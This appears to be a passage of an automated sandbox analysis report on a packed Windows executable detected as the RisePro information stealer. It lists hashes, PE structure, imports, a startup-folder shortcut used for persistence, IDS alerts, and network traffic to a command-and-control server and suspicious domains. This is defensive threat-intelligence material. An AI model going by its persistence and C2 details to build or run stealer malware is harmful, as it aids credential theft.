                    SHA-512:B55BA87B275A475E751E13EC9BAC2E7F1A3484057844E210168E2256D73D9B6A7C7C7592845D4A3BF8163CF0D479315418A9F3CB8F2F4832AF88A06867E3DF93
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 83%
                    Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....M.a.....................^.......w......0....@...........................}.....m.F.......................................w.......w.|.............E.............................................................P.w..............................MPRESS1.pw.......?......................MPRESS22.....w.......?..................rsrc...|.....w.......?.............@..............................................................................v2.19w...?. ...o......G>H.r9aQ..(.......`....=....?....!.Z..&I........I18..Z!..Y..s...[QX....a....YY...).v.....n......|)....^f..+.>..84h82g...>*.hb\...E.(.x.....@.8_.9.4U.m..'.s......#.....03.......O..]`..S2.@#.........oF~.*.R..Q..q.o.yn...OA@|....g...F....0.j.......s/..H..+ 0C.!....7s..^H,...... ..{...............D......r.I..,|........u.6......E>q..}....g..).U..ME.'.j}.........7^...w.......Le......k.T.`.#%....b..n.F.&-o..../8S.E..{1.E..,....<.c|b.z.Fz........|..W"p.

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Fri May 17 20:45:15 2024, mtime=Fri May 17 20:45:15 2024, atime=Fri May 17 20:45:15 2024, length=4563640, window=hide
                    Category:dropped
                    Size (bytes):1330
                    Entropy (8bit):4.862977598680543
                    Encrypted:false
                    SSDEEP:24:8KHfmf8HVMQROgKb6xA9lE9d7lwXAIB1yNdFd2aSnqygm:8KHuErRy6xIExwwIB1yVryg
                    MD5:C519A29483EE8E20AA66C2CBC23EA91F
                    SHA1:245FD3D3F14D96CF46380E7DB0018727F62E16D7
                    SHA-256:0399769E4CD0930D72CED5E76A98ACB37116D28F75A3FF8C27D385DFA9774B12
                    SHA-512:CA8EF450FD17E6CEF7F1D28727ED90A36FD60F0E263E022F48B4017AC6AE80D14EE23E14A16D4525BB491BEBB47EA48D9121ADD350684578C9E39CAA19F62335
                    Malicious:false
                    Preview:L..................F.... ...c.......c................E.....................X.:..DG..Yr?.D..U..k0.&...&...... M........p....$...........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X......B.....................Bdg.A.p.p.D.a.t.a...B.P.1......X....Local.<......DWSl.X......V.....................S4N.L.o.c.a.l.....N.1......X....Temp..:......DWSl.X......\....................... .T.e.m.p.......1......X....EDGEMS~1.........X...X.............................. .E.d.g.e.M.S.2._.4.5.c.4.8.c.c.e.2.e.2.d.7.f.b.d.e.a.1.a.f.c.5.1.c.7.c.6.a.d.2.6.....b.2...E..X.. .EdgeMS2.exe.H......X...X............................c.q.E.d.g.e.M.S.2...e.x.e.......................-............................C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe....E.d.g.e.M.S.2.Q.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.M.S.2._.4.5.c.4.8.c.c.e.2.e.2.d.7.f.b.d.e.a.1.a.f.c.5.1.c.7.c.6.a.d.2.6.\.E.d.g.e.M.S.2...e.x.e.........

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.973325521474956
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:8'778'752 bytes
                    MD5:3d09739846543f4962f2b432da671c29
                    SHA1:2247e38b1f5257df93db091328488c652f6bea0a
                    SHA256:70aaa6e67944e919f8c7bbdf71b6b09deed41f51166bc1dc15fc6f66efc1b014
                    SHA512:f762d0c8d9ce9a8a7189af007ec9b6e4ff863005f982d107b2b276281152f64386425b7fbe8ceda2b96ab9d7f827eb99358e3920ec79c9f5a063b87aa7e7bf5d
                    SSDEEP:196608:EMnAaGWGFMEFFP8/1IK56wtjoRvH8FPuAfs/4:ZnAafG5w/1I4TtsRvqur
                    TLSH:F796336331651185D1EAC93E9A377E9533F2523F464184FCB4A97FC22AE25F5E203A83
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...jR;f...............'............?X............@.................................p.....@................................

                    File Icon

                    Icon Hash:07e3b7d7b794c087

                    Static PE Info

                    General

                    Entrypoint:0xc7583f
                    Entrypoint Section:.vmpY[.
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x663B526A [Wed May 8 10:22:34 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:d784b50e0634f83cc71436d4fb111768

                    Entrypoint Preview

                    Instruction
                    push D6FCCA80h
                    call 00007F2B8D8299F1h
                    inc ecx
                    jmp 00007F2B8D27FB97h
                    stc
                    xor edx, 1F142980h
                    stc
                    xor ebx, edx
                    cmp di, 1557h
                    stc
                    add ebp, edx
                    jmp 00007F2B8D3AC82Dh
                    je 00007F2B8D366777h
                    mov bl, cl
                    sub bl, 00000030h
                    jmp 00007F2B8D36D01Ch
                    dec edx
                    cmp esp, 40C2572Eh
                    xor ebx, edx
                    add edi, edx
                    jmp 00007F2B8D30919Ah
                    jmp 00007F2B8D229C49h
                    inc ecx
                    dec ebx
                    push ebp
                    inc esp
                    xor dword ptr [esp], ebx
                    inc eax
                    xchg ch, ch
                    inc eax
                    shl ch, FFFFFFA1h
                    bt bp, sp
                    pop ebp
                    stc
                    inc ebp
                    test cl, ah
                    dec ebp
                    arpl bx, bx
                    inc esp
                    test bl, dl
                    jmp 00007F2B8D29711Ah
                    or esi, ebx
                    lodsb
                    test dword ptr [eax-0879947Ah], 8E05EDA3h
                    neg dword ptr [edx+eax+52F795DBh]
                    mov ah, 54h
                    sahf
                    or dword ptr [eax+08CC3DDEh], esp
                    dec esi
                    sbb byte ptr [esi+08h], ah
                    int1

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0xed6cf80x190.vmpY[.
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xf760000x26ee8.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xf750000x5c8.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0xd25c800x20.vmpY[.
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xf737600x40.vmpY[.
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x75a0000x290.vmpY[.
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x7b18800x40.vmpY[.
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x15bae80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0x15d0000x27e320x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x1850000x49300x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .vmp#+0x18a0000x121e7a0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .vmp#+0x2ac0000x5800x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .vmp#+0x2ad0000x1427e00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .vmpY[.0x3f00000x34b3e70x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .vmpY[.0x73c0000x8380100x838200bdacb5ec0292c102fa3f2bae395ef848unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .reloc0xf750000x5c80x6002025a475ee6a4cf5d3bdd2e9ccf3e193False0.5325520833333334data4.322933984772373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .rsrc0xf760000x26ee80x26800dd048426ffb4368f719a01897ce94a50False0.6937715604707793data6.736445338106505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    AFX_DIALOG_LAYOUT0xf9c6bc0x2dataKoreanNorth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6bc0x2dataKoreanSouth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6c00x2dataKoreanNorth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6c00x2dataKoreanSouth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6c40x2dataKoreanNorth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6c40x2dataKoreanSouth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6c80x2dataKoreanNorth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6c80x2dataKoreanSouth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6cc0x2dataKoreanNorth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6cc0x2dataKoreanSouth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6d00x2dataKoreanNorth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6d00x2dataKoreanSouth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6d40x2data5.0
                    AFX_DIALOG_LAYOUT0xf9c6d80x2dataKoreanNorth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6d80x2dataKoreanSouth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6dc0x2data5.0
                    AFX_DIALOG_LAYOUT0xf9c6e00x2dataKoreanNorth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6e00x2dataKoreanSouth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6e40x2data5.0
                    AFX_DIALOG_LAYOUT0xf9c6e80x2dataKoreanNorth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6e80x2dataKoreanSouth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6ec0x2data5.0
                    AFX_DIALOG_LAYOUT0xf9c6f00x2dataKoreanNorth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6f00x2dataKoreanSouth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6f40x2data5.0
                    AFX_DIALOG_LAYOUT0xf9c6f80x2dataKoreanNorth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6f80x2dataKoreanSouth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c6fc0x2data5.0
                    AFX_DIALOG_LAYOUT0xf9c7000x2dataKoreanNorth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c7000x2dataKoreanSouth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c7040x2data5.0
                    AFX_DIALOG_LAYOUT0xf9c7080x2dataKoreanNorth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c7080x2dataKoreanSouth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c70c0x2data5.0
                    AFX_DIALOG_LAYOUT0xf9c7100x2dataKoreanNorth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c7100x2dataKoreanSouth Korea5.0
                    AFX_DIALOG_LAYOUT0xf9c7140x7adata0.09836065573770492
                    AFX_DIALOG_LAYOUT0xf9c7900x7adataKoreanNorth Korea0.10714285714285714
                    AFX_DIALOG_LAYOUT0xf9c7900x7adataKoreanSouth Korea0.10714285714285714
                    AFX_DIALOG_LAYOUT0xf9c80c0x2empty0
                    AFX_DIALOG_LAYOUT0xf9c8100x2emptyKoreanNorth Korea0
                    AFX_DIALOG_LAYOUT0xf9c8100x2emptyKoreanSouth Korea0
                    AFX_DIALOG_LAYOUT0xf9c8140x2empty0
                    AFX_DIALOG_LAYOUT0xf9c8180x2emptyKoreanNorth Korea0
                    AFX_DIALOG_LAYOUT0xf9c8180x2emptyKoreanSouth Korea0
                    AFX_DIALOG_LAYOUT0xf9c81c0x2empty0
                    AFX_DIALOG_LAYOUT0xf9c8200x2emptyKoreanNorth Korea0
                    AFX_DIALOG_LAYOUT0xf9c8200x2emptyKoreanSouth Korea0
                    AFX_DIALOG_LAYOUT0xf9c8240x2empty0
                    AFX_DIALOG_LAYOUT0xf9c8280x2emptyKoreanNorth Korea0
                    AFX_DIALOG_LAYOUT0xf9c8280x2emptyKoreanSouth Korea0
                    AFX_DIALOG_LAYOUT0xf9c82c0x5aempty0
                    AFX_DIALOG_LAYOUT0xf9c8880x5aemptyKoreanNorth Korea0
                    AFX_DIALOG_LAYOUT0xf9c8880x5aemptyKoreanSouth Korea0
                    AFX_DIALOG_LAYOUT0xf9c8e40x2empty0
                    AFX_DIALOG_LAYOUT0xf9c8e80x2emptyKoreanNorth Korea0
                    AFX_DIALOG_LAYOUT0xf9c8e80x2emptyKoreanSouth Korea0
                    RT_ICON0xf768b40x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.774822695035461
                    RT_ICON0xf76d1c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.5385892116182572
                    RT_ICON0xf792c40x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.4255441854962735
                    RT_ICON0xf89aec0x11965PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.999250385218707
                    RT_MENU0xf9c8ec0x2f4empty0
                    RT_MENU0xf9cbe00x308emptyKoreanNorth Korea0
                    RT_MENU0xf9cbe00x308emptyKoreanSouth Korea0
                    RT_GROUP_ICON0xf9b4540x3edata0.8225806451612904
                    RT_VERSION0xf9b4940x3ecdata0.3615537848605578
                    RT_MANIFEST0xf9b8800xe3bXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.38594564919022784

                    Imports

                    DLLImport
                    KERNEL32.dllGetVersionExA
                    USER32.dllwsprintfA
                    GDI32.dllCreateCompatibleBitmap
                    ADVAPI32.dllRegQueryValueExA
                    SHELL32.dllShellExecuteA
                    ole32.dllCoInitialize
                    WS2_32.dllWSAStartup
                    CRYPT32.dllCryptUnprotectData
                    SHLWAPI.dllPathFindExtensionA
                    gdiplus.dllGdipGetImageEncoders
                    SETUPAPI.dllSetupDiEnumDeviceInfo
                    ntdll.dllRtlUnicodeStringToAnsiString
                    RstrtMgr.DLLRmStartSession
                    KERNEL32.dllHeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress
                    WTSAPI32.dllWTSSendMessageW
                    KERNEL32.dllVirtualQuery, GetSystemTimeAsFileTime, GetModuleHandleA, CreateEventA, GetModuleFileNameW, LoadLibraryA, TerminateProcess, GetCurrentProcess, CreateToolhelp32Snapshot, Thread32First, GetCurrentProcessId, GetCurrentThreadId, OpenThread, Thread32Next, CloseHandle, SuspendThread, ResumeThread, WriteProcessMemory, GetSystemInfo, VirtualAlloc, VirtualProtect, VirtualFree, GetProcessAffinityMask, SetProcessAffinityMask, GetCurrentThread, SetThreadAffinityMask, Sleep, FreeLibrary, GetTickCount, SystemTimeToFileTime, FileTimeToSystemTime, GlobalFree, LocalAlloc, LocalFree, GetProcAddress, ExitProcess, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, GetModuleHandleW, LoadResource, MultiByteToWideChar, FindResourceExW, FindResourceExA, WideCharToMultiByte, GetThreadLocale, GetUserDefaultLCID, GetSystemDefaultLCID, EnumResourceNamesA, EnumResourceNamesW, EnumResourceLanguagesA, EnumResourceLanguagesW, EnumResourceTypesA, EnumResourceTypesW, CreateFileW, LoadLibraryW, GetLastError, FlushFileBuffers, CreateFileA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, GetCommandLineA, RaiseException, RtlUnwind, HeapFree, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, LCMapStringA, LCMapStringW, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapCreate, HeapDestroy, QueryPerformanceCounter, HeapReAlloc, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, WriteFile, SetFilePointer, GetConsoleCP, GetConsoleMode, InitializeCriticalSectionAndSpinCount, SetStdHandle
                    USER32.dllGetProcessWindowStation, GetUserObjectInformationW, CharUpperBuffW, MessageBoxW
                    KERNEL32.dllLocalAlloc, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, FreeLibrary, LoadLibraryA, GetModuleHandleA, GetProcAddress
                    USER32.dllGetProcessWindowStation, GetUserObjectInformationW

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    KoreanNorth Korea
                    KoreanSouth Korea

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    05/17/24-23:45:00.848746TCP2049060ET TROJAN RisePro TCP Heartbeat Packet4970450500192.168.2.55.42.96.65
                    05/17/24-23:45:05.461512TCP2046269ET TROJAN [ANY.RUN] RisePro TCP (Activity)4970450500192.168.2.55.42.96.65
                    05/17/24-23:45:05.093768TCP2046268ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings)4970450500192.168.2.55.42.96.65
                    05/17/24-23:45:14.161367TCP2019714ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile4970780192.168.2.55.42.96.170
                    05/17/24-23:45:02.216807TCP2046267ET TROJAN [ANY.RUN] RisePro TCP (External IP)50500497045.42.96.65192.168.2.5
                    05/17/24-23:45:01.844974TCP2046266ET TROJAN [ANY.RUN] RisePro TCP (Token)50500497045.42.96.65192.168.2.5

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    May 17, 2024 23:45:00.823570013 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:00.830173969 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:00.830306053 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:00.848746061 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:00.888148069 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:01.844974041 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:01.898729086 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:02.212306023 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:02.212758064 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:02.216774940 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:02.216806889 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:02.216887951 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:02.442466974 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:02.442562103 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:02.447838068 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:02.505626917 CEST49705443192.168.2.534.117.186.192
                    May 17, 2024 23:45:02.505665064 CEST4434970534.117.186.192192.168.2.5
                    May 17, 2024 23:45:02.505752087 CEST49705443192.168.2.534.117.186.192
                    May 17, 2024 23:45:02.507396936 CEST49705443192.168.2.534.117.186.192
                    May 17, 2024 23:45:02.507406950 CEST4434970534.117.186.192192.168.2.5
                    May 17, 2024 23:45:03.331181049 CEST4434970534.117.186.192192.168.2.5
                    May 17, 2024 23:45:03.331459045 CEST49705443192.168.2.534.117.186.192
                    May 17, 2024 23:45:03.335395098 CEST49705443192.168.2.534.117.186.192
                    May 17, 2024 23:45:03.335402012 CEST4434970534.117.186.192192.168.2.5
                    May 17, 2024 23:45:03.335609913 CEST4434970534.117.186.192192.168.2.5
                    May 17, 2024 23:45:03.383002043 CEST49705443192.168.2.534.117.186.192
                    May 17, 2024 23:45:03.397473097 CEST49705443192.168.2.534.117.186.192
                    May 17, 2024 23:45:03.444129944 CEST4434970534.117.186.192192.168.2.5
                    May 17, 2024 23:45:03.670281887 CEST4434970534.117.186.192192.168.2.5
                    May 17, 2024 23:45:03.670437098 CEST4434970534.117.186.192192.168.2.5
                    May 17, 2024 23:45:03.670505047 CEST49705443192.168.2.534.117.186.192
                    May 17, 2024 23:45:03.673120022 CEST49705443192.168.2.534.117.186.192
                    May 17, 2024 23:45:03.673135042 CEST4434970534.117.186.192192.168.2.5
                    May 17, 2024 23:45:03.673151970 CEST49705443192.168.2.534.117.186.192
                    May 17, 2024 23:45:03.673157930 CEST4434970534.117.186.192192.168.2.5
                    May 17, 2024 23:45:03.771847963 CEST49706443192.168.2.5172.67.75.166
                    May 17, 2024 23:45:03.771873951 CEST44349706172.67.75.166192.168.2.5
                    May 17, 2024 23:45:03.771949053 CEST49706443192.168.2.5172.67.75.166
                    May 17, 2024 23:45:03.772314072 CEST49706443192.168.2.5172.67.75.166
                    May 17, 2024 23:45:03.772325039 CEST44349706172.67.75.166192.168.2.5
                    May 17, 2024 23:45:04.619467020 CEST44349706172.67.75.166192.168.2.5
                    May 17, 2024 23:45:04.619560957 CEST49706443192.168.2.5172.67.75.166
                    May 17, 2024 23:45:04.622503042 CEST49706443192.168.2.5172.67.75.166
                    May 17, 2024 23:45:04.622514963 CEST44349706172.67.75.166192.168.2.5
                    May 17, 2024 23:45:04.622746944 CEST44349706172.67.75.166192.168.2.5
                    May 17, 2024 23:45:04.624036074 CEST49706443192.168.2.5172.67.75.166
                    May 17, 2024 23:45:04.664135933 CEST44349706172.67.75.166192.168.2.5
                    May 17, 2024 23:45:05.081523895 CEST44349706172.67.75.166192.168.2.5
                    May 17, 2024 23:45:05.081813097 CEST44349706172.67.75.166192.168.2.5
                    May 17, 2024 23:45:05.081913948 CEST49706443192.168.2.5172.67.75.166
                    May 17, 2024 23:45:05.087728977 CEST49706443192.168.2.5172.67.75.166
                    May 17, 2024 23:45:05.087744951 CEST44349706172.67.75.166192.168.2.5
                    May 17, 2024 23:45:05.087759018 CEST49706443192.168.2.5172.67.75.166
                    May 17, 2024 23:45:05.087764025 CEST44349706172.67.75.166192.168.2.5
                    May 17, 2024 23:45:05.093767881 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:05.177021027 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:05.461512089 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:05.466664076 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:05.517889977 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:05.570538998 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:05.649158001 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:05.656826019 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:05.834423065 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:05.883008003 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:06.044207096 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:06.086308002 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:06.086450100 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:06.096681118 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:06.450611115 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:06.452780008 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:06.452914953 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:06.457537889 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:06.462457895 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:06.462470055 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:06.462507963 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:06.508004904 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:06.604279041 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:06.633135080 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:06.638257980 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:07.002048969 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:07.054877043 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:07.070698023 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:07.112792015 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:07.485585928 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:07.539239883 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:11.537136078 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:11.542507887 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:11.544882059 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:11.549984932 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:11.550066948 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:11.554996967 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:11.555010080 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:11.555022001 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:11.555033922 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:11.555046082 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:11.555057049 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:11.555068016 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:11.555073977 CEST4970450500192.168.2.55.42.96.65
                    May 17, 2024 23:45:11.555079937 CEST50500497045.42.96.65192.168.2.5
                    May 17, 2024 23:45:11.555093050 CEST50500497045.42.96.65192.168.2.5

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    May 17, 2024 23:45:02.493062973 CEST6026653192.168.2.51.1.1.1
                    May 17, 2024 23:45:02.500276089 CEST53602661.1.1.1192.168.2.5
                    May 17, 2024 23:45:03.675697088 CEST6090153192.168.2.51.1.1.1
                    May 17, 2024 23:45:03.770749092 CEST53609011.1.1.1192.168.2.5
                    May 17, 2024 23:45:17.505036116 CEST5550153192.168.2.51.1.1.1
                    May 17, 2024 23:45:17.515978098 CEST53555011.1.1.1192.168.2.5
                    May 17, 2024 23:45:31.140155077 CEST6385853192.168.2.51.1.1.1
                    May 17, 2024 23:45:31.150041103 CEST53638581.1.1.1192.168.2.5
                    May 17, 2024 23:45:32.140742064 CEST5352447162.159.36.2192.168.2.5
                    May 17, 2024 23:45:32.950365067 CEST5177353192.168.2.51.1.1.1
                    May 17, 2024 23:45:32.998289108 CEST53517731.1.1.1192.168.2.5

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    May 17, 2024 23:45:02.493062973 CEST192.168.2.51.1.1.10xac3fStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                    May 17, 2024 23:45:03.675697088 CEST192.168.2.51.1.1.10xf651Standard query (0)db-ip.comA (IP address)IN (0x0001)false
                    May 17, 2024 23:45:17.505036116 CEST192.168.2.51.1.1.10x6fe6Standard query (0)kuljyftgjk.onlineA (IP address)IN (0x0001)false
                    May 17, 2024 23:45:31.140155077 CEST192.168.2.51.1.1.10x6f3bStandard query (0)kuljyftgjk.onlineA (IP address)IN (0x0001)false
